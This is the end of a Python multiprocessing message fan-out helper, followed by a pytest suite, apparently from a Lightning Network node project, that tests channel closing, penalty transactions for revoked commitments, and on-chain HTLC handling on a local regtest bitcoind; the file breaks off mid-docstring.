            messages.append(Message.new())
        p = Process(target=_send_message_multiple_one, args=(q, messages[-1], endpoint))
        p.start()
        workers.append(p)
    # Block on each worker's result instead of busy-waiting on q.full(),
    # which burned a CPU core (and Queue.full() is documented as
    # unreliable); q.get() sleeps until an item is available.
    for i in range(number_of_messages):
        q.get()
    for p in workers:
        p.join()
    queue.put(messages)
    return
def send_message_multiple(message, *endpoints):
    """
    Fan *message* out to every endpoint in parallel.

    :param message: Message to send, or None to create new ones.
    :param endpoints: Endpoint mappings (see `_send_message_multiple`).
    :return: A list of (message, endpoint) pairs.

    NOTE(review): results are paired with endpoints in queue-completion
    order, which may not be the endpoint that actually sent them; this
    matches the original behaviour -- verify whether callers rely on
    the pairing.
    """
    q = Queue(maxsize=len(endpoints))
    workers = []
    for endpoint in endpoints:
        p = Process(target=_send_message_multiple, args=(q, message, endpoint))
        p.start()
        workers.append(p)
    messages = list()
    # q.get() blocks until each worker reports, replacing the previous
    # busy-wait on q.full() which spun at 100% CPU.
    for i in endpoints:
        messages.extend(map(lambda x: (x, i), q.get()))
    for p in workers:
        p.join()
    return messages
|
test_closing.py | from fixtures import * # noqa: F401,F403
from lightning import RpcError
from utils import only_one, sync_blockheight, wait_for, DEVELOPER, TIMEOUT, VALGRIND, SLOW_MACHINE
import queue
import pytest
import re
import threading
import unittest
@unittest.skipIf(not DEVELOPER, "Too slow without --dev-bitcoind-poll")
def test_closing(node_factory, bitcoind):
    """Full mutual-close lifecycle: negotiate a close, broadcast and
    confirm it, then verify both nodes resolve their outputs and
    eventually forget the channel."""
    l1, l2 = node_factory.line_graph(2)
    chan = l1.get_channel_scid(l2)
    l1.pay(l2, 200000000)
    assert bitcoind.rpc.getmempoolinfo()['size'] == 0
    billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
    assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
    billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
    assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
    bitcoind.generate_block(5)
    # Only wait for the channels to activate with DEVELOPER=1,
    # otherwise it's going to take too long because of the missing
    # --dev-broadcast-interval
    if DEVELOPER:
        wait_for(lambda: len(l1.getactivechannels()) == 2)
        wait_for(lambda: len(l2.getactivechannels()) == 2)
        billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
        # This may either be from a local_update or an announce, so just
        # check for the substring
        assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]
    # This should return with an error, then close.
    with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
        l1.rpc.close(chan, False, 0)
    l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
    l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
    l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
    l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
    # And should put closing into mempool.
    l1.daemon.wait_for_log('sendrawtx exit 0')
    l2.daemon.wait_for_log('sendrawtx exit 0')
    # Both nodes should have disabled the channel in their view
    wait_for(lambda: len(l1.getactivechannels()) == 0)
    wait_for(lambda: len(l2.getactivechannels()) == 0)
    assert bitcoind.rpc.getmempoolinfo()['size'] == 1
    # Now grab the close transaction
    closetxid = only_one(bitcoind.rpc.getrawmempool(False))
    billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
    assert billboard == ['CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi']
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log(r'Owning output .* txid %s' % closetxid)
    l2.daemon.wait_for_log(r'Owning output .* txid %s' % closetxid)
    # Make sure both nodes have grabbed their close tx funds
    assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
    assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])
    wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
        'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi',
        'ONCHAIN:Tracking mutual close transaction',
        'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
    ])
    bitcoind.generate_block(9)
    wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
        'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of 5430 satoshi',
        'ONCHAIN:Tracking mutual close transaction',
        'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
    ])
    # Make sure both have forgotten about it
    bitcoind.generate_block(90)
    wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
    wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_while_disconnected(node_factory, bitcoind):
    """A close initiated while the peer is stopped completes once the
    peer restarts and reconnects."""
    l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
    chan = l1.get_channel_scid(l2)
    l1.pay(l2, 200000000)
    l2.stop()
    # The close should still be triggered afterwards.
    with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
        l1.rpc.close(chan, False, 0)
    l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
    l2.start()
    l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
    l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
    # And should put closing into mempool.
    l1.daemon.wait_for_log('sendrawtx exit 0')
    l2.daemon.wait_for_log('sendrawtx exit 0')
    bitcoind.generate_block(101)
    wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
    wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_id(node_factory):
    """Test closing using peer ID and full channel ID
    """
    l1, l2 = node_factory.get_nodes(2)
    # Close by full channel ID.
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)
    cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
    l2.rpc.close(cid)
    # Both sides dropping the connection confirms the close completed.
    wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
    wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
    # Close by peer ID.
    l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
    l1.daemon.wait_for_log("Handed peer, entering loop")
    l2.fund_channel(l1, 10**6)
    pid = l1.info['id']
    l2.rpc.close(pid)
    wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
    wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
@unittest.skipIf(not DEVELOPER, "needs dev-rescan-outputs")
def test_closing_torture(node_factory, executor, bitcoind):
    """Repeatedly open a channel and race both peers to close it."""
    l1, l2 = node_factory.get_nodes(2)
    amount = 10**6

    # Historically, 15 rounds would often pass before the fix was applied;
    # more rounds catch the race reliably, but VALGRIND (~4x slower than
    # native) and slow machines would hit CI timeouts since the test
    # prints no output, so scale the count down accordingly.
    attempts = 50
    if VALGRIND:
        attempts //= 4
    if SLOW_MACHINE:
        attempts //= 2

    for _ in range(attempts):
        # Reduce probability that spurious sendrawtx error will occur
        l1.rpc.dev_rescan_outputs()

        # Open a fresh channel and get it confirmed.
        l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
        l1.fund_channel(l2, amount)
        scid = l1.get_channel_scid(l2)
        l1.bitcoin.generate_block(6)

        # Both ends must reach CHANNELD_NORMAL before we start closing.
        l1.wait_channel_active(scid)
        l2.wait_channel_active(scid)

        # Fire both closers concurrently: can take a long time under valgrind!
        close1 = executor.submit(l1.rpc.close, l2.info['id'], False, 60)
        close2 = executor.submit(l2.rpc.close, l1.info['id'], False, 60)
        close1.result(TIMEOUT)
        close2.result(TIMEOUT)

        # Exactly one mutual-close tx should land in the mempool.
        wait_for(lambda: len(bitcoind.rpc.getrawmempool(False)) == 1)

        # Bury the close so both sides forget the peer.
        l1.bitcoin.generate_block(100)
        wait_for(lambda: len(l1.rpc.listpeers()['peers']) == 0)
        wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_closing_different_fees(node_factory, bitcoind, executor):
    """Mutual close must complete even when peers prefer different feerates.

    One central node (l1) opens a channel to each of a grid of peers —
    every feerate preference crossed with every payment amount — then all
    channels are closed in parallel and every close must reach the
    mempool and ONCHAIN state.
    """
    l1 = node_factory.get_node()

    # Default feerate = 15000/7500/1000
    # It will start at the second number, accepting anything above the first.
    feerates = [[20000, 15000, 7400], [8000, 1001, 100]]
    # NOTE(review): any nonzero amount triggers the same 100000000msat
    # payment below, so 545999 vs 546000 behave identically here —
    # presumably chosen around a dust boundary; confirm the distinction
    # still matters.
    amounts = [0, 545999, 546000]
    num_peers = len(feerates) * len(amounts)

    # Give l1 on-chain funds to open all the channels from.
    addr = l1.rpc.newaddr()['address']
    bitcoind.rpc.sendtoaddress(addr, 1)
    numfunds = len(l1.rpc.listfunds()['outputs'])
    bitcoind.generate_block(1)
    wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)

    # Create them in a batch, for speed!
    peers = []
    for feerate in feerates:
        for amount in amounts:
            p = node_factory.get_node(feerates=feerate)
            # Stash the test parameters on the node object for later phases.
            p.feerate = feerate
            p.amount = amount
            l1.rpc.connect(p.info['id'], 'localhost', p.port)
            peers.append(p)

    for p in peers:
        p.channel = l1.rpc.fundchannel(p.info['id'], 10**6)['channel_id']
        # Technically, this is async to fundchannel returning.
        l1.daemon.wait_for_log('sendrawtx exit 0')

    bitcoind.generate_block(6)

    # Now wait for them all to hit normal state, do payments
    l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
                            + ['to CHANNELD_NORMAL'] * num_peers)
    for p in peers:
        if p.amount != 0:
            l1.pay(p, 100000000)

    # Now close all channels
    # All closes occur in parallel, and on Travis,
    # ALL those lightningd are running on a single core,
    # so increase the timeout so that this test will pass
    # when valgrind is enabled.
    # (close timeout defaults to 30 as of this writing)
    closes = [executor.submit(l1.rpc.close, p.channel, False, 90) for p in peers]

    for c in closes:
        c.result(90)

    # close does *not* wait for the sendrawtransaction, so do that!
    # Note that since they disagree on the ideal fee, they may conflict
    # (first one in will win), so we cannot look at logs, we need to
    # wait for mempool.
    wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)

    bitcoind.generate_block(1)
    for p in peers:
        p.daemon.wait_for_log(' to ONCHAIN')
        wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])
    l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
    """Closing-signed negotiation must survive disconnects at every point."""
    # Drop the connection before, during and after sending WIRE_CLOSING_SIGNED.
    disconnects = ['-WIRE_CLOSING_SIGNED',
                   '@WIRE_CLOSING_SIGNED',
                   '+WIRE_CLOSING_SIGNED']
    l1 = node_factory.get_node(disconnect=disconnects, may_reconnect=True)
    l2 = node_factory.get_node(may_reconnect=True)

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    scid = l1.fund_channel(l2, 10**6)
    l1.pay(l2, 200000000)

    assert bitcoind.rpc.getmempoolinfo()['size'] == 0

    # This should return with an error, then close.
    with pytest.raises(RpcError, match=r'Channel close negotiation not finished'):
        l1.rpc.close(scid, False, 0)
    l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
    l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')

    # Despite the injected disconnects, both reach fee negotiation.
    l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
    l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')

    # And should put closing into mempool (happens async, so
    # CLOSINGD_COMPLETE may come first).
    l1.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
    l2.daemon.wait_for_logs(['sendrawtx exit 0', ' to CLOSINGD_COMPLETE'])
    assert bitcoind.rpc.getmempoolinfo()['size'] == 1
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_inhtlc(node_factory, bitcoind, executor):
    """Test penalty transaction with an incoming HTLC.

    l1 is made to broadcast a revoked commitment (snapshotted while an
    HTLC was in flight); l2 must sweep every non-to-us output with
    OUR_PENALTY_TX and end up with all the funds (minus fees).
    """
    # We suppress each one after first commit; HTLC gets added not fulfilled.
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'], may_fail=True, feerates=(7500, 7500, 7500))
    l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED-nocommit'])

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)

    # Now, this will get stuck due to l1 commit being disabled..
    t = executor.submit(l1.pay, l2, 100000000)

    assert len(l1.getactivechannels()) == 2
    assert len(l2.getactivechannels()) == 2

    # They should both have commitments blocked now.
    l1.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')
    l2.daemon.wait_for_log('=WIRE_COMMITMENT_SIGNED-nocommit')

    # Make sure l1 got l2's commitment to the HTLC, and sent to master.
    l1.daemon.wait_for_log('UPDATE WIRE_CHANNEL_GOT_COMMITSIG')

    # Take our snapshot: this commitment tx becomes revoked once the
    # payment completes below.
    tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']

    # Let them continue
    l1.rpc.dev_reenable_commit(l2.info['id'])
    l2.rpc.dev_reenable_commit(l1.info['id'])

    # Should fulfill.
    l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
    l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')

    l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
    l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')

    # Payment should now complete.
    t.result(timeout=10)

    # Now we really mess things up! Broadcast the revoked commitment.
    bitcoind.rpc.sendrawtransaction(tx)
    bitcoind.generate_block(1)

    l2.daemon.wait_for_log(' to ONCHAIN')
    # FIXME: l1 should try to stumble along!
    wait_for(lambda: len(l2.getactivechannels()) == 0)

    # l2 should spend all of the outputs (except to-us).
    # Could happen in any order, depending on commitment tx.
    # Rewind logsearch_start so both broadcasts are found regardless of order.
    needle = l2.daemon.logsearch_start
    l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
                                   'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')

    l2.daemon.logsearch_start = needle
    l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
                                   'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')

    # FIXME: test HTLC tx race!

    # 100 blocks later, all resolved.
    bitcoind.generate_block(100)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')

    outputs = l2.rpc.listfunds()['outputs']
    assert [o['status'] for o in outputs] == ['confirmed'] * 2
    # Allow some lossage for fees.
    assert sum(o['value'] for o in outputs) < 10**6
    assert sum(o['value'] for o in outputs) > 10**6 - 15000
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_penalty_outhtlc(node_factory, bitcoind, executor):
    """Test penalty transaction with an outgoing HTLC.

    Same shape as test_penalty_inhtlc but the snapshotted (revoked)
    commitment carries an HTLC offered *by* l1, so l2 sweeps
    OUR_HTLC instead of THEIR_HTLC and ends with three outputs.
    """
    # First we need to get funds to l2, so suppress after second.
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'], may_fail=True, feerates=(7500, 7500, 7500))
    l2 = node_factory.get_node(disconnect=['=WIRE_COMMITMENT_SIGNED*3-nocommit'])

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)

    # Move some across to l2.
    l1.pay(l2, 200000000)

    # The '*3' disconnect must not have fired during the setup payment.
    assert not l1.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')
    assert not l2.daemon.is_in_log('=WIRE_COMMITMENT_SIGNED')

    # Now, this will get stuck due to l1 commit being disabled..
    t = executor.submit(l2.pay, l1, 100000000)

    # Make sure we get signature from them.
    l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
    l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')

    # They should both have commitments blocked now.
    l1.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')
    l2.daemon.wait_for_log('dev_disconnect: =WIRE_COMMITMENT_SIGNED')

    # Make sure both sides got revoke_and_ack for that commitment.
    l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
    l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')

    # Take our snapshot: this commitment becomes revoked once the
    # payment completes below.
    tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']

    # Let them continue
    l1.rpc.dev_reenable_commit(l2.info['id'])
    l2.rpc.dev_reenable_commit(l1.info['id'])

    # Thread should complete.
    t.result(timeout=10)

    # Make sure both sides got revoke_and_ack for final.
    l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
    l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')

    # Now we really mess things up! Broadcast the revoked commitment.
    bitcoind.rpc.sendrawtransaction(tx)
    bitcoind.generate_block(1)

    l2.daemon.wait_for_log(' to ONCHAIN')
    # FIXME: l1 should try to stumble along!

    # l2 should spend all of the outputs (except to-us).
    # Could happen in any order, depending on commitment tx.
    # Rewind logsearch_start so the broadcasts are found regardless of order.
    needle = l2.daemon.logsearch_start
    l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
                                   'THEIR_REVOKED_UNILATERAL/DELAYED_OUTPUT_TO_THEM')

    l2.daemon.logsearch_start = needle
    l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
                                   'THEIR_REVOKED_UNILATERAL/OUR_HTLC')

    l2.daemon.logsearch_start = needle
    l2.daemon.wait_for_log('Ignoring output.*: THEIR_REVOKED_UNILATERAL/OUTPUT_TO_US')

    # FIXME: test HTLC tx race!

    # 100 blocks later, all resolved.
    bitcoind.generate_block(100)
    wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)

    outputs = l2.rpc.listfunds()['outputs']
    assert [o['status'] for o in outputs] == ['confirmed'] * 3
    # Allow some lossage for fees.
    assert sum(o['value'] for o in outputs) < 10**6
    assert sum(o['value'] for o in outputs) > 10**6 - 15000
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_first_commit(node_factory, bitcoind):
    """Onchain handling where funder immediately drops to chain"""
    # Funder (l1) drops the connection right after funding locked,
    # then perma-fails the channel.
    l1 = node_factory.get_node(disconnect=['+WIRE_FUNDING_LOCKED', 'permfail'])
    # Make locktime different, as we once had them reversed!
    l2 = node_factory.get_node(options={'watchtime-blocks': 10})
    l1.fundwallet(10**7)

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.rpc.fundchannel(l2.info['id'], 10**6)
    l1.daemon.wait_for_log('sendrawtx exit 0')

    l1.bitcoin.generate_block(1)

    # l1 will drop to chain.
    l1.daemon.wait_for_log('permfail')
    l1.daemon.wait_for_log('sendrawtx exit 0')
    l1.bitcoin.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')

    # 10 later, l1 should collect its to-self payment.
    bitcoind.generate_block(10)
    l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    # 94 later, l2 is done.
    bitcoind.generate_block(94)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')

    # Now, 100 blocks and l1 should be done.
    bitcoind.generate_block(6)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_unwatch(node_factory, bitcoind):
    """Onchaind should not watch random spends"""
    l1, l2 = node_factory.line_graph(2)

    l1.pay(l2, 200000000)

    # Force a unilateral close from l1.
    l1.rpc.dev_fail(l2.info['id'])
    l1.daemon.wait_for_log('Failing due to dev-fail command')
    l1.wait_for_channel_onchain(l2.info['id'])

    l1.bitcoin.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')

    # After the 10-block delay, l1 sweeps its own to-self output.
    bitcoind.generate_block(10)
    l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    # First time it sees it, onchaind cares.
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('Resolved OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by our proposal '
                           'OUR_DELAYED_RETURN_TO_WALLET')

    # Churn the wallet with a spend unrelated to the channel: the daemon
    # gets told about it and says it doesn't care.
    l1.rpc.withdraw(l1.rpc.newaddr()['address'], 'all')
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log("but we don't care")

    # And lightningd should respect that!
    assert not l1.daemon.is_in_log("Can't unwatch txid")

    # Further unrelated spends should not generate any more messages.
    for _ in range(5):
        l1.rpc.withdraw(l1.rpc.newaddr()['address'], 'all')
        bitcoind.generate_block(1)
        # Make sure it digests the block
        sync_blockheight(bitcoind, [l1])

    # We won't see this again.
    assert not l1.daemon.is_in_log("but we don't care",
                                   start=l1.daemon.logsearch_start)

    # Note: for this test we leave onchaind running, so we can detect
    # any leaks!
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchaind_replay(node_factory, bitcoind):
    """Onchaind must be restartable from DB state.

    Forces a unilateral close, buries it deep enough that a restarted l1
    has to reconstruct onchaind from the channeltxs table, and checks the
    replayed onchaind still proposes the to-wallet sweep.
    """
    disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
    # Long watchtime/cltv so nothing resolves before we restart l1.
    options = {'watchtime-blocks': 201, 'cltv-delta': 101}
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(options=options, disconnect=disconnects, feerates=(7500, 7500, 7500))
    l2 = node_factory.get_node(options=options)

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)
    rhash = l2.rpc.invoice(10**8, 'onchaind_replay', 'desc')['payment_hash']
    routestep = {
        'msatoshi': 10**8 - 1,
        'id': l2.info['id'],
        'delay': 101,
        'channel': '1x1x1'
    }
    l1.rpc.sendpay([routestep], rhash)
    l1.daemon.wait_for_log('sendrawtx exit 0')
    bitcoind.generate_block(1)

    # Wait for nodes to notice the failure, this search needle is after the
    # DB commit so we're sure the tx entries in onchaindtxs have been added
    l1.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")
    l2.daemon.wait_for_log("Deleting channel .* due to the funding outpoint being spent")

    # We should at least have the init tx now
    assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0
    assert len(l2.db_query("SELECT * FROM channeltxs;")) > 0

    # Generate some blocks so we restart the onchaind from DB (we rescan
    # last_height - 100)
    bitcoind.generate_block(100)
    sync_blockheight(bitcoind, [l1, l2])

    # l1 should still have a running onchaind
    assert len(l1.db_query("SELECT * FROM channeltxs;")) > 0

    l2.rpc.stop()
    l1.restart()

    # Can't wait for it, it's after the "Server started" wait in restart()
    assert l1.daemon.is_in_log(r'Restarting onchaind for channel')

    # l1 should still notice that the funding was spent and that we should react to it
    l1.daemon.wait_for_log("Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET")
    sync_blockheight(bitcoind, [l1])
    bitcoind.generate_block(10)
    sync_blockheight(bitcoind, [l1])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_dust_out(node_factory, bitcoind, executor):
    """Onchain handling of outgoing dust htlcs (they should fail)"""
    # HTLC 1->2, 1 fails after it's irrevocably committed
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(disconnect=['@WIRE_REVOKE_AND_ACK', 'permfail'],
                               feerates=(7500, 7500, 7500))
    l2 = node_factory.get_node()

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)

    # Must be dust!
    rhash = l2.rpc.invoice(1, 'onchain_dust_out', 'desc')['payment_hash']
    dust_hop = {
        'msatoshi': 1,
        'id': l2.info['id'],
        'delay': 5,
        'channel': '1x1x1'
    }

    l1.rpc.sendpay([dust_hop], rhash)
    pay_future = executor.submit(l1.rpc.waitsendpay, rhash)

    # l1 will drop to chain.
    l1.daemon.wait_for_log('permfail')
    l1.wait_for_channel_onchain(l2.info['id'])
    l1.bitcoin.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')

    # We use 3 blocks for "reasonable depth"
    bitcoind.generate_block(3)

    # A dust HTLC has no commitment-tx output, so the payment must fail.
    with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: missing in commitment tx'):
        pay_future.result(5)

    # Retry payment, this should fail (and, as a side-effect, tickle a
    # bug).
    with pytest.raises(RpcError, match=r'WIRE_UNKNOWN_NEXT_PEER'):
        l1.rpc.sendpay([dust_hop], rhash)

    # 6 later, l1 should collect its to-self payment.
    bitcoind.generate_block(6)
    l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    # 94 later, l2 is done.
    bitcoind.generate_block(94)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')

    # Restart l1, it should not crash!
    l1.restart()

    # Now, 100 blocks and l1 should be done.
    bitcoind.generate_block(6)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')

    # Payment failed, BTW
    assert only_one(l2.rpc.listinvoices('onchain_dust_out')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
    """Onchain handling of outgoing failed htlcs"""
    # HTLC 1->2, 1 fails just after it's irrevocably committed
    disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
    l2 = node_factory.get_node()

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fund_channel(l2, 10**6)

    rhash = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')['payment_hash']
    # We underpay, so it fails.
    routestep = {
        'msatoshi': 10**8 - 1,
        'id': l2.info['id'],
        'delay': 5,
        'channel': '1x1x1'
    }

    l1.rpc.sendpay([routestep], rhash)
    with pytest.raises(RpcError):
        l1.rpc.waitsendpay(rhash)

    # Make sure CLTVs are different, in case it confuses onchaind.
    bitcoind.generate_block(1)
    sync_blockheight(bitcoind, [l1])

    # Second one will cause drop to chain.
    l1.rpc.sendpay([routestep], rhash)
    payfuture = executor.submit(l1.rpc.waitsendpay, rhash)

    # l1 will drop to chain.
    l1.daemon.wait_for_log('permfail')
    l1.wait_for_channel_onchain(l2.info['id'])
    l1.bitcoin.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')

    # Wait for timeout proposals: to-self sweep after 5 blocks, HTLC
    # timeout tx after 6.
    l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
                             'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
    bitcoind.generate_block(4)

    l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')

    bitcoind.generate_block(1)
    l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                   'OUR_UNILATERAL/OUR_HTLC')

    # We use 3 blocks for "reasonable depth"
    bitcoind.generate_block(3)

    # It should fail.
    with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
        payfuture.result(5)

    # 2 later, l1 spends HTLC (5 blocks total).
    bitcoind.generate_block(2)
    l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')

    # 89 later, l2 is done.
    bitcoind.generate_block(89)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')

    # Now, 100 blocks and l1 should be done.
    bitcoind.generate_block(10)
    sync_blockheight(bitcoind, [l1])
    # l1 must wait the full depth: not forgotten one block early.
    assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')

    # Payment failed, BTW
    assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_onchain_middleman(node_factory, bitcoind):
    """Middle hop drops to chain after learning the preimage.

    HTLC 1->2->3: the 1->2 link dies just as l2 tries to forward the
    fulfill back, so l2 must fulfill the HTLC on-chain via
